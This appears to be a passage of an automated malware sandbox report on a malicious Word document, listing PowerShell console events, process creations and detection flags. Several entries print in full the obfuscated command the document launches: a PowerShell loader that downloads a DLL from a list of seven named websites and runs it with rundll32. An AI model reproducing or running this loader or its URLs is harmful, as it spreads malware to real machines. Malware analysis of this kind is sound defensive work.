Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................h.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0...............8.M.....4.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....H.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....@...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........Ixk......M.............................}..v....P.......0...............8.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....0......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....p1..............................}..v.....1......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.......'........................wI..... .......................}..v.....8...... ...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................Hxk....p9..............................}..v.....9......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................Ixk......M.............................}..v....X?......0.......................~.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................Hxk.....@..............................}..v.....@......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v.....D......0...............8.M.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Hxk....XE..............................}..v.....E......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Ixk......M.............................}..v.....L......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Hxk....XM..............................}..v.....M......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Ixk......M.............................}..v.....T......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Hxk....XU..............................}..v.....U......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................Ixk......M.............................}..v.....\......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................Hxk....X]..............................}..v.....]......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Ixk......M.............................}..v.....d......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Hxk....Xe..............................}..v.....e......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....l......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....Xm..............................}..v.....m......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....t......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....Xu..............................}..v.....u......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....|......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....X}..............................}..v.....}......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....X...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................h.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....H.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....H.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....x.......0...............8.M.....4.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....0...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....(.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........Ixk......M.............................}..v............0...............8.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....p...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Jqxk......M.............................}..v....p&!.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk....('!.............................}..v.....'!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Jqxk......M.............................}..v....H.!.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk...../!.............................}..v...../!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.7.1.............}..v.....3!.....0.................M.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk....H4!.............................}..v.....4!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Jqxk......M.............................}..v.....;!.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk....H<!.............................}..v.....<!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............Jqxk......M.............................}..v.....C!.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............*pxk....HD!.............................}..v.....D!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............Jqxk......M.............................}..v.....K!.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............*pxk....HL!.............................}..v.....L!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............Jqxk......M.............................}..v.....S!.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............*pxk....HT!.............................}..v.....T!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............Jqxk......M.............................}..v.....[!.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............*pxk....H\!.............................}..v.....\!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............Jqxk......M.............................}..v.....c!.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............*pxk....Hd!.............................}..v.....d!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............Jqxk......M.............................}..v.....k!.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............*pxk....Hl!.............................}..v.....l!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............Jqxk......M.............................}..v.....s!.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............*pxk....Ht!.............................}..v.....t!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............Jqxk......M.............................}..v.....z!.....0.......................h.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............*pxk.....z!.............................}..v....8{!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Jqxk......M.............................}..v......!.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk......!.............................}..v....8.!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .t.e.r.B.i.n.d.i.n.g.E.x.c.e.p.t.i.o.n.....}..v....X.!.....0.................M.....,.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk......!.............................}..v......!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Jqxk......M.............................}..v....X.!.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk......!.............................}..v......!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .n.d.s...I.n.v.o.k.e.E.x.p.r.e.s.s.i.o.n.C.o.m.m.a.n.d.....0.................M.....<.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk......!.............................}..v......!.....0...............X.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......Jqxk......M.............................}..v......!.....0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk....P.!.............................}..v......!.....0...............X.M.............................Jump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$1711.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD7E7.tmpJump to behavior
Source: classification engineClassification label: mal84.expl.winDOC@5/13@0/0
Source: 1711.docOLE document summary: title field not present or empty
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~DFF0F57547FC904286.TMP.0.drOLE document summary: title field not present or empty
Source: ~DFF0F57547FC904286.TMP.0.drOLE document summary: author field not present or empty
Source: ~DFF0F57547FC904286.TMP.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Suspicious powershell command line foundShow sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
